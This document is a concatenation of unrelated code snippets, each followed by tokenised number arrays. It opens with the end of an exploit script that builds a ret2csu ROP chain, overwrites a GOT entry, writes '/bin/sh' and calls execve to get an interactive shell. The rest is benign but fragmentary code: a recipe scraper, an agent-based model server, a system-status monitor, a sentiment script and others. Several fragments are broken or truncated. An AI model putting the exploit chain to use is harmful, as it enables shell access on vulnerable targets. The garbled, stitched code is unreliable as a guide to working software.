x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e
\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e'
proc.send(payload)
time.sleep(0.2)
proc.recvrepeat(0)
payload = p64(0x0)
payload += p64(target_base + __libc_csu_init_gadget1)
payload += p64(0x4141414141414141)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(target_base + __libc_csu_init_call_target)
payload += p64(0x0)
payload += p64(target_base + target.got['read'])
payload += p64(0x1)
payload += p64(target_base + __libc_csu_init_gadget2)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(target_base + target.sym['read'])
payload += p64(target_base + __libc_csu_init_gadget1)
payload += p64(0x4141414141414141)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(target_base + __libc_csu_init_call_target)
payload += p64(0x1)
payload += p64(0x0)
payload += p64(0x0)
payload += p64(target_base + __libc_csu_init_gadget2)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(target_base + target.sym['read'])
payload += p64(target_base + __libc_csu_init_gadget1)
payload += p64(0x4141414141414141)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(target_base + __libc_csu_init_call_target)
payload += p64(0x0)
payload += p64(target_base + target.bss())
payload += p64(0x3b)
payload += p64(target_base + __libc_csu_init_gadget2)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(target_base + target.sym['read'])
payload += p64(target_base + __libc_csu_init_gadget1)
payload += p64(0x4141414141414141)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(target_base + __libc_csu_init_call_target)
payload += p64(target_base + target.bss())
payload += p64(0x0)
payload += p64(0x0)
payload += p64(target_base + __libc_csu_init_gadget2)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(target_base + target.sym['read'])
proc.send(payload)
time.sleep(0.2)
payload = b'\x0e'
proc.send(payload)
time.sleep(0.2)
payload = b'\x2f\x62\x69\x6e\x2f\x73\x68\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
proc.send(payload)
time.sleep(0.2)
proc.interactive()
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
6738,
279,
675,
1330,
1635,
198,
22866,
13,
19119,
7,
998,
796,
705,
28745,
2414,
3256,
28686,
796,
705,
23289,
3256,
2604,
62,
5715,
796,
705,
10951,
11537,
198,
198,
16793,
796,
... | 1.201777 | 10,690 |
import inspect
from bs4 import BeautifulSoup
from typing import Optional, Union
from ._settings import HEADERS
from ._schema import DefaultSchema
from ._utils import clean_vulgar_fraction, clean_unicode
class AllRecipes(DefaultSchema):
"""
"""
@classmethod
def __init__(self, url: str, headers: Optional[dict] = HEADERS):
"""
url : str
url
headers : dict, Optional
dict
"""
super().__init__(url)
self.soup = BeautifulSoup(self.page, "html.parser")
def title(self):
"""
"""
return self.soup.find("meta", {"property": "og:title"}).get("content")
def description(self):
"""
"""
return self.soup.find("meta", {"property": "og:description"}).get("content")
def instructions(self):
"""
"""
tags = self.soup.find("ul", {"class": "instructions-section"}).find_all("p")
return [tag.get_text() for tag in tags]
def author(self):
"""
"""
return self.soup.find("span", {"class": "author-name authorName"}).get_text()
def ratings(self):
"""
"""
return self.soup.find("meta", {"name": "og:rating"}).get("content")
def yields(self):
"""
"""
pass
def time(self) -> float:
"""
"""
pass
def category(self) -> list:
"""
"""
return [
self.soup.find("a", {"class": "breadcrumbs__link--last"})
.find("span")
.get_text()
]
def nutrition(self) -> dict:
"""
"""
nutrition = {}
text = (
self.soup.find("div", {"class": "recipe-nutrition-section"})
.find("div", {"class": "section-body"})
.get_text()
.strip()
)
if text.endswith("Full Nutrition"):
text = text.replace(". Full Nutrition", "")
text = text.split(";")
nutrition["Calories"] = float(text[0].split(" ")[0])
for t in text[1:]:
nutrient, amount = t.strip().split(" ")
nutrition[nutrient] = amount
return nutrition
def ingredients(self) -> list:
"""
"""
tags = self.soup.find_all("span", {"class": "ingredients-item-name"})
return [clean_unicode(tag.get_text()) for tag in tags]
| [
11748,
10104,
198,
6738,
275,
82,
19,
1330,
23762,
50,
10486,
198,
6738,
19720,
1330,
32233,
11,
4479,
198,
198,
6738,
47540,
33692,
1330,
39837,
4877,
198,
6738,
47540,
15952,
2611,
1330,
15161,
27054,
2611,
198,
6738,
47540,
26791,
1330... | 2.135472 | 1,122 |
import sys
import re
import doctest
import manuel.doctest
import manuel.codeblock
import manuel.testing
import unittest
if sys.version_info[0] < 3:
# Just don't do them under Python 3.
# Sigh.
if __name__ == '__main__':
unittest.TextTestRunner().run(additional_tests())
| [
11748,
25064,
198,
11748,
302,
198,
11748,
10412,
395,
198,
11748,
582,
2731,
13,
4598,
310,
395,
198,
11748,
582,
2731,
13,
8189,
9967,
198,
11748,
582,
2731,
13,
33407,
198,
11748,
555,
715,
395,
628,
198,
361,
25064,
13,
9641,
62,
... | 2.76699 | 103 |
import pandas as pd
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
import psycopg2
from sqlalchemy import create_engine
from config import db_password
#data from: https://www.kaggle.com/malapatiravi/graduate-school-admission-data/home
| [
11748,
19798,
292,
355,
279,
67,
198,
6738,
1341,
35720,
13,
29127,
62,
19849,
1330,
5972,
2569,
8081,
2234,
198,
6738,
1341,
35720,
13,
19849,
62,
49283,
1330,
4512,
62,
9288,
62,
35312,
198,
6738,
1341,
35720,
13,
3866,
36948,
1330,
... | 3.365385 | 104 |
from mesa.visualization.ModularVisualization import ModularServer
from mesa.visualization.modules import CanvasGrid
from mesa.visualization.UserParam import UserSettableParameter
from mesa.visualization.modules import ChartModule
from .model import CivilViolenceModel
from .agent import Citizen, Cop
COP_COLOR = "Black"
AGENT_QUIET_COLOR = "Blue"
AGENT_REBEL_COLOR = "Red"
JAIL_COLOR = "Grey"
height=70
width=70
model_params = {
'height':height,
'width':width,
# 'height': UserSettableParameter('slider', 'Height', 40, 10, 100, 1,
# description='Citizen Density'),
# 'width': UserSettableParameter('slider', 'Width', 40, 10, 100, 1,
# description='Citizen Density'),
'citizen_density': UserSettableParameter('slider', 'Citizen Density', 0.7, 0.0, 1, 0.01,
description='Citizen Density'),
'cop_density': UserSettableParameter('slider', 'Cop Density', 0.1, 0.0, 1, 0.01,
description='Cop Density'),
'citizen_vision': UserSettableParameter('slider', 'Citizen Vision', 7, 0, 20, 1,
description='Citizen vision'),
'cop_vision': UserSettableParameter('slider', 'Cop Vision', 7, 0, 20, 1,
description='Cop Vision'),
'legitimacy': UserSettableParameter('slider', 'Legitimacy', 0.8, 0.0, 1.0, 0.01,
description='Legitimacy'),
'max_jail_term': UserSettableParameter('slider', 'Max Jail Term', 1000, 0, 10000, 1,
description='Max Jail Term')
}
chart = ChartModule([{"Label": "Active",
"Color": "Red"}],
data_collector_name='datacollector')
canvas_element = CanvasGrid(citizen_cop_portrayal, model_params['height'], model_params['height'], 700, 700)
server = ModularServer(CivilViolenceModel, [canvas_element, chart],
"Epstein Civil Violence", model_params)
| [
6738,
18842,
64,
13,
41464,
1634,
13,
5841,
934,
36259,
1634,
1330,
3401,
934,
10697,
198,
6738,
18842,
64,
13,
41464,
1634,
13,
18170,
1330,
1680,
11017,
41339,
198,
6738,
18842,
64,
13,
41464,
1634,
13,
12982,
22973,
1330,
11787,
50,
... | 2.090909 | 1,023 |
import json
from elasticsearch import Elasticsearch
from tube.etl.outputs.es.timestamp import (
putting_timestamp,
get_latest_utc_transaction_time,
)
from tube.etl.outputs.es.versioning import Versioning
from tube.etl.plugins import post_process_plugins, add_auth_resource_path_mapping
from tube.etl.spark_base import SparkBase
from tube.utils.general import get_node_id_name
| [
11748,
33918,
198,
198,
6738,
27468,
12947,
1330,
48567,
12947,
198,
198,
6738,
12403,
13,
316,
75,
13,
22915,
82,
13,
274,
13,
16514,
27823,
1330,
357,
198,
220,
220,
220,
5137,
62,
16514,
27823,
11,
198,
220,
220,
220,
651,
62,
42... | 3.055118 | 127 |
import math
from classes.dataframes import *
import numpy as np
# class Utility:
#
# def __init__(self):
# self.Data = Dataframes()
# self.df_orders = self.Data.get_df_orders()
# self.grid_rows = self.Data.grid_row
# self.grid_cols = self.Data.grid_col
# self.df_wrhs = self.Data.get_df_wareouses()
# def calc_distance(self, xa, ya, xb, yb):
# return math.sqrt((abs(xa - xb)) ** 2 + (abs(ya - yb)) ** 2)
| [
11748,
10688,
198,
6738,
6097,
13,
7890,
37805,
1330,
1635,
198,
11748,
299,
32152,
355,
45941,
628,
198,
2,
1398,
34030,
25,
198,
2,
198,
2,
220,
220,
220,
220,
825,
11593,
15003,
834,
7,
944,
2599,
198,
2,
220,
220,
220,
220,
22... | 2.171429 | 210 |
from typing import Dict, List, Union
from sqlalchemy.dialects.postgresql import ENUM
from db import db
from models.model_mixin import ModelMixin
ActorJSON = Dict[str, Union[int, str, List[str]]]
gender_enum = ENUM("Male", "Female", name="gender")
class ActorModel(db.Model, ModelMixin):
"""SQLAlchemy model for actors"""
__tablename__ = "actors"
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(50), nullable=False)
date_of_birth = db.Column(db.Date, nullable=False)
gender = db.Column(gender_enum)
@classmethod
@classmethod
@classmethod
| [
6738,
19720,
1330,
360,
713,
11,
7343,
11,
4479,
201,
198,
6738,
44161,
282,
26599,
13,
38969,
478,
82,
13,
7353,
34239,
13976,
1330,
12964,
5883,
201,
198,
6738,
20613,
1330,
20613,
201,
198,
6738,
4981,
13,
19849,
62,
19816,
259,
13... | 2.503968 | 252 |
#!/usr/bin/env spcli
# this command runs hierarchical FST comparison
from seqpy import cout, cerr
from seqpy.cmds import arg_parser
from seqpy.core.bioio import tabparser
import itertools
import allel
| [
2,
48443,
14629,
14,
8800,
14,
24330,
599,
44506,
198,
198,
2,
428,
3141,
4539,
38958,
376,
2257,
7208,
198,
198,
6738,
33756,
9078,
1330,
42304,
11,
269,
8056,
198,
6738,
33756,
9078,
13,
28758,
82,
1330,
1822,
62,
48610,
198,
6738,
... | 3.166667 | 66 |
import argparse
import csv
import logging
import random
import numpy as np
import nibabel as nib
from pathlib import Path
if __name__ == "__main__":
logging.basicConfig(format='%(asctime)s | %(name)-4s | %(levelname)-4s | %(message)s',
level=logging.INFO, datefmt='%Y-%m-%d %H:%M:%S')
args = _parse_args()
main(args)
| [
11748,
1822,
29572,
198,
11748,
269,
21370,
198,
11748,
18931,
198,
11748,
4738,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
33272,
9608,
355,
33272,
198,
6738,
3108,
8019,
1330,
10644,
628,
628,
198,
361,
11593,
3672,
834,
6624,
366,... | 2.288462 | 156 |
from base import LeetCodeProblem
class Problem(LeetCodeProblem):
# for behaviours other than exact match between solution output and expected output
# see # Testers in README.md
"""
https://leetcode.com/problems/super-ugly-number/
# first attempt:
## invariant
since all prime factor of SUNum are in primes,
it means SUNums can be obtained by multiplying primes
## approach:
generate SUNum by multiplying members of primes and push onto a max heap
when max heap reaches n size, get max
"""
# instanciate your Problem class and run
prob = Problem()
prob.run()
| [
6738,
2779,
1330,
1004,
316,
10669,
40781,
628,
198,
4871,
20647,
7,
3123,
316,
10669,
40781,
2599,
198,
220,
220,
220,
1303,
329,
38975,
584,
621,
2748,
2872,
1022,
4610,
5072,
290,
2938,
5072,
198,
220,
220,
220,
1303,
766,
1303,
30... | 3.226316 | 190 |
import networkx.algorithms.operators.tests.test_all
import pytest
from graphscope.nx.utils.compat import import_as_graphscope_nx
import_as_graphscope_nx(networkx.algorithms.operators.tests.test_all,
decorators=pytest.mark.usefixtures("graphscope_session"))
@pytest.mark.skip(reason="not support multigraph")
@pytest.mark.skip(reason="not support multigraph")
@pytest.mark.skip(reason="not support multigraph")
@pytest.mark.skip(reason="not support multigraph")
@pytest.mark.skip(reason="not support multigraph")
@pytest.mark.skip(reason="not support multigraph")
| [
11748,
3127,
87,
13,
282,
7727,
907,
13,
3575,
2024,
13,
41989,
13,
9288,
62,
439,
198,
11748,
12972,
9288,
198,
198,
6738,
4823,
29982,
13,
77,
87,
13,
26791,
13,
5589,
265,
1330,
1330,
62,
292,
62,
34960,
29982,
62,
77,
87,
198,... | 2.795349 | 215 |
import os
| [
198,
11748,
28686,
198
] | 2.75 | 4 |
import numpy as np
import pandas as pd
import gzip
import sys
from collections import Counter
import os
DATA_DIR = "../data/"
if not os.path.exists(DATA_DIR):
os.makedirs(DATA_DIR)
| [
11748,
299,
32152,
355,
45941,
198,
11748,
19798,
292,
355,
279,
67,
198,
11748,
308,
13344,
198,
11748,
25064,
198,
6738,
17268,
1330,
15034,
198,
11748,
28686,
198,
198,
26947,
62,
34720,
796,
366,
40720,
7890,
30487,
198,
198,
361,
4... | 2.690141 | 71 |
#!/usr/bin/env python
# coding: utf-8
# In[17]:
import numpy as np
from numpy import linalg as LA
dimension=2 #次元を指定する
v=randomnumber(dimension)
e=np.zeros((dimension,dimension),dtype='float64')#エルミット演算子を生成する単位ベクトル
u=getu(dimension)
print(u)
for c in range(0,dimension):
e[c]=u[c]/LA.norm(u[c],2)#·ord=2
print(e)
# In[18]:
#psi=np.random.random((dimension))
#psi=e[0]
psi=np.array([e[0]])
print(psi)
print(LA.norm(psi,2)) #ノルム確認
# In[19]:
np.dot(np.dot(psi,e),psi.T)
# In[27]:
f=0
for a in range(0,10000):
u=getu(dimension)
for c in range(0,dimension):
e[c]=u[c]/LA.norm(u[c],2)#·ord=2
psi=psi=np.array([e[0]])
d=np.dot(np.dot(psi,e),psi.T)
if(d>=0):
f=f+1
print(f)
# # 多量子ビット系
# In[28]:
for a in range(0,2):
# In[ ]:
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
2,
19617,
25,
3384,
69,
12,
23,
198,
198,
2,
554,
58,
1558,
5974,
628,
198,
11748,
299,
32152,
355,
45941,
198,
6738,
299,
32152,
1330,
300,
1292,
70,
355,
9131,
628,
198,
46156,
2... | 1.694387 | 481 |
import json
import io
| [
11748,
33918,
198,
11748,
33245,
628
] | 3.833333 | 6 |
import json
import os
import random
import requests
from django_project import settings
from django.http import HttpResponse, JsonResponse
from messenger.utils.response.ResponseTypes.QuickReplyResponse import QuickReplyResponse
from messenger.utils.response.ResponseTypes.TextResponse import TextResponse
from django.conf import settings
def value_validator(variables, values):
"""
1. Checks if "values" is of type <dict>
2. Checks if all variables are present in the values <dict>
:param variables: <list>
:param values: <dict>
:raise: InvalidTemplateValues, IncompleteTemplateValues
:return None
"""
return None
# if type(values) is not dict:
# raise InvalidTemplateValues(values)
# elif set(variables) != set(dict.keys(values)):
# raise IncompleteTemplateValues([v for v in variables if v not in values])
class Response(object):
"""
Response class for chat data and text templating.
"""
def __init__(self, data, page_access_token=None):
"""
:param data: message data
"""
self.params = {"access_token": page_access_token}
self.headers = {"Content-Type": "application/json"}
self.data = {"recipient": {"id": None}, "message": {}}
self.text = TextResponse(data["text"]) \
if "text" in data else None
self.quick_replies = QuickReplyResponse(data["quick_replies"]) \
if "quick_replies" in data else None
self.attachments = data.get("attachments", {})
def add_recipient_id(self, recipient_id):
"""
Adds the chat receivers id to instance
:param recipient_id: facebook_id of a chat participant
"""
self.data["recipient"]["id"] = recipient_id
def send_to(self, recipient_id, page_access_token, node_name):
"""
Orders messages before sending
:param recipient_id: facebook_id of a chat participant
"""
self.params = {"access_token": page_access_token}
self.add_recipient_id(recipient_id)
r = None
if self.quick_replies and self.text: # If quick_replies and text
r = self.send(self.data["message"], ["quick_replies", "text"], recipient_id) # are both present send both
elif self.text:
# send text if quick_replies
r = self.send(self.data["message"], ["text"], recipient_id) # are not present
if self.attachments: # Send attachments alone
r = self.send(self.data["message"], ["attachment"], recipient_id)
# always, in compatible with
# text and quick_replies
self.data['intent'] = node_name
return JsonResponse(self.data)
def extract_message(self, text_response_data=None, quick_reply_response_data=None, attachment_response_data=None):
"""
Evaluate template strings in text/quick_replies/attachments and convert them to a value.
:param text_response_data:
:param quick_reply_response_data:
:param attachment_response_data:
:rtype: Response
"""
if self.text:
self.data["message"]["text"] = self.text.eval(text_response_data)
if self.quick_replies:
self.data["message"]["quick_replies"] = self.quick_replies.eval(quick_reply_response_data)
if self.attachments:
if attachment_response_data:
stringified_attachments = json.dumps(self.attachments)
for item in attachment_response_data:
stringified_attachments = stringified_attachments.replace('{}', str(item), 1)
self.attachments = json.loads(stringified_attachments)
print('*' * 100)
self.data["message"]["attachment"] = self.attachments
return self
def send(self, message, types, recipient_id):
"""
HTTP Request to facebook endpoint to send messages
:param message:
:param types:
:param recipient_id:
:return:
"""
data = {
"recipient": {
"id": recipient_id
},
"message": {
type: message[type] for type in types
}
}
if self.params.get('access_token'):
# r = requests.post(
# "https://graph.facebook.com/v4.0/me/messages",
# params=self.params,
# headers=self.headers,
# data=json.dumps(data)
# )
# print(r.text)
return JsonResponse(data, status=200)
else:
return JsonResponse({}, status=200)
| [
11748,
33918,
198,
11748,
28686,
198,
11748,
4738,
198,
198,
11748,
7007,
198,
6738,
42625,
14208,
62,
16302,
1330,
6460,
198,
6738,
42625,
14208,
13,
4023,
1330,
367,
29281,
31077,
11,
449,
1559,
31077,
198,
198,
6738,
31228,
13,
26791,
... | 2.309073 | 2,061 |
# coding: utf-8
import os
from urllib.request import urlopen
import pytest
from selenium.webdriver import Firefox, ActionChains
from selenium.webdriver.common.by import By
from selenium.webdriver.firefox.options import Options
from selenium.webdriver.support.expected_conditions import staleness_of
from selenium.webdriver.support.wait import WebDriverWait
URL = 'http://localhost:8000/'
HEADLESS = not os.getenv('NO_HEADLESS')
try:
with urlopen(URL):
SERVER_RUNNING = True
except OSError:
SERVER_RUNNING = False
@pytest.fixture
@pytest.mark.skipif(not SERVER_RUNNING, reason='requires local server running')
| [
2,
19617,
25,
3384,
69,
12,
23,
198,
198,
11748,
28686,
198,
6738,
2956,
297,
571,
13,
25927,
1330,
19016,
9654,
198,
198,
11748,
12972,
9288,
198,
6738,
384,
11925,
1505,
13,
12384,
26230,
1330,
16802,
11,
7561,
1925,
1299,
198,
6738... | 2.939535 | 215 |
import pandas as pd
from sklearn.cluster import KMeans
import numpy as np
import matplotlib.pyplot as plt
from datetime import datetime, date, time, timedelta
import re
import pickle
import time as tm
df = pd.read_csv("bitcoin_auto.csv", dtype={"COMPOUND": float})
df = df.drop_duplicates()
# print(df.head())
df.info()
# tm.sleep(120)
# Handle missing data
# df['COMPOUND'] = df['COMPOUND'].fillna(0)
# today_date = datetime.today()
# event_date = datetime(2018, 4, 13, 21, 0, 0) # Date of Syria bombing announcement
# event_date = datetime(2018, 6, 12, 12, 0, 0) # Date of Korean Summit
# print(event_date)
temp_list = []
for index, row in df.iterrows():
f_date = row['DATE'][4:20]
year = row['DATE'][26:]
f_date = f_date + year
# print(f_date)
regex = re.findall(r"[a-zA-Z]|\d", f_date)
f_date = "".join(regex)
datetime_object = datetime.strptime(f_date, '%b%d%H%M%S%Y')
# print(datetime_object)
t = today_date - datetime_object
# print(t)
temp_list.append(t)
df['T_minus'] = temp_list
f1 = []
f2 = []
for index, row in df.iterrows():
time = (row['T_minus'].days * 24) + (row['T_minus'].seconds/3600)
# time = row['T_minus'].seconds
f1.append(time)
print(time)
f2.append(row['COMPOUND'])
# print(row['COMPOUND'])
# print(len(f1))
# print(len(f2))
# Pickle arrays
f1_file = open('btc_hours_f1.pkl', 'wb')
f2_file = open('btc_hours_f2.pkl', 'wb')
pickle.dump(f1, f1_file)
pickle.dump(f2, f2_file)
# Plot Data
plt.xlabel('Time(hours)')
plt.ylabel('Compound sentiment score')
plt.scatter(f1, f2, c='black', s=1)
plt.show()
| [
201,
198,
11748,
19798,
292,
355,
279,
67,
201,
198,
6738,
1341,
35720,
13,
565,
5819,
1330,
509,
5308,
504,
201,
198,
11748,
299,
32152,
355,
45941,
201,
198,
11748,
2603,
29487,
8019,
13,
9078,
29487,
355,
458,
83,
201,
198,
6738,
... | 2.166448 | 763 |
from typing import Collection, Dict, Union
from modules import bar
from datetime import timedelta
import psutil
valid_fstypes = ["ntfs", "ext4", "ext3"]
def get_pc_status() -> Union[Dict[str, str], Dict[str, dict], Dict[str, str]]:
"""With the help of the psutil module, scanns the PC for information about all the drives, the memory and the battery, if it has one.
Returns disk, memory, battery in this order.
"""
disks = get_disk_status()
memory = {"RAM":psutil.virtual_memory()._asdict(), "SWAP": psutil.swap_memory()._asdict()}
battery = get_battery_status()
return disks, memory, battery
def get_graphical(bar_size, in_dict=False) -> Union[str, Dict[str, list]]:
    """Build a visual representation of the system's status using the bar module.

    Shows each disk's and the memory's percentage, used and total space, and
    the battery's remaining lifetime (if it is plugged in) together with the
    battery's percentage.

    Args:
        bar_size: width of the loading bar, forwarded to ``bar.loading_bar``.
        in_dict: when True, return ``{label: [total, used, bar], ...}``;
            otherwise return a single formatted multi-line string.

    FIXES: ``!= None`` / ``== None`` replaced with identity comparisons
    (PEP 8 E711); repeated bytes→GiB conversion hoisted into one helper;
    return annotation corrected (dict values are lists, not strings).
    """
    def _gib(raw) -> str:
        # Human-readable GiB string, rounded to 2 decimals (same arithmetic
        # and formatting as the original inline expressions).
        return f"{round(int(raw) / (1024 ** 3), 2)} GiB"

    disks, memory, battery = get_pc_status()
    bars = bar.loading_bar("", 100, size=bar_size, show="▓", off_show="░")
    if battery is not None:
        bars.update(round(battery["percent"], 1), False)
        battery["bar"] = bars.bar()
    if in_dict:
        d = {}
    else:
        string = ""
    # One entry per mount point.
    for mp, disk in disks.items():
        bars.update(round(disk["percent"], 1), False)
        dbar = bars.bar()
        total = _gib(disk["total"])
        used = _gib(disk["used"])
        if in_dict:
            d[f"{mp.upper()}"] = [total, used, dbar]
        else:
            string += f"{mp}: Max: {total}, used: {used}\n{dbar}\n"
    # RAM and swap usage.
    for key in ["RAM", "SWAP"]:
        used = _gib(memory[key]["used"])
        _max = _gib(memory[key]["total"])
        bars.update(round(memory[key]["percent"], 1), False)
        _bar = bars.bar()
        if in_dict:
            d[key] = [_max, used, _bar]
        else:
            string += f"Max RAM memory: {_max} / Used memory: {used}\n{_bar}\n"
    # Battery section (may be absent on desktops).
    if battery is None:
        if in_dict:
            d['Battery'] = ["Not detected"]
        else:
            string += "Battery not detected!"
    else:
        tmp = "" if battery["power_plugged"] else "not "
        if in_dict:
            d["Battery"] = [timedelta(seconds=battery['secsleft']), f"The power is {tmp}plugged in", battery['bar']]
        else:
            string += f"Remaining battery life: {timedelta(seconds=battery['secsleft'])} and it's {tmp}plugged in.\nBattery status:\n {battery['bar']}"
    if in_dict:
        return d
    else:
        return string
if __name__ == "__main__" :
    # Demo entry point: print the textual system report with 25-char bars.
    print(get_graphical(25))
| [
6738,
19720,
1330,
12251,
11,
360,
713,
11,
4479,
198,
6738,
13103,
1330,
2318,
198,
6738,
4818,
8079,
1330,
28805,
12514,
198,
11748,
26692,
22602,
198,
12102,
62,
69,
301,
9497,
796,
14631,
429,
9501,
1600,
366,
2302,
19,
1600,
366,
... | 2.314738 | 1,201 |
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author: wxnacy@gmail.com
"""
"""
import os
import json
import yaml
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
2,
532,
9,
12,
19617,
25,
40477,
12,
23,
532,
9,
12,
198,
2,
6434,
25,
266,
87,
77,
1590,
31,
14816,
13,
785,
198,
37811,
198,
198,
37811,
198,
198,
11748,
28686,
198,
11748,
339... | 2.32 | 50 |
import sys
if __name__ == '__main__':
    # NOTE(review): main() is not defined anywhere in this fragment —
    # presumably it lives in the unseen part of the original script; running
    # this as-is would raise NameError. Confirm before use. `sys` is also
    # imported but unused here.
    main()
| [
198,
11748,
25064,
628,
198,
198,
361,
11593,
3672,
834,
6624,
705,
834,
12417,
834,
10354,
198,
220,
220,
220,
1388,
3419,
628,
628,
628,
628,
198
] | 2.259259 | 27 |
from .domain import *
from .common import *
| [
6738,
764,
27830,
1330,
1635,
198,
6738,
764,
11321,
1330,
1635,
198
] | 3.666667 | 12 |
import os
import urllib
| [
11748,
28686,
198,
11748,
2956,
297,
571,
628
] | 3.125 | 8 |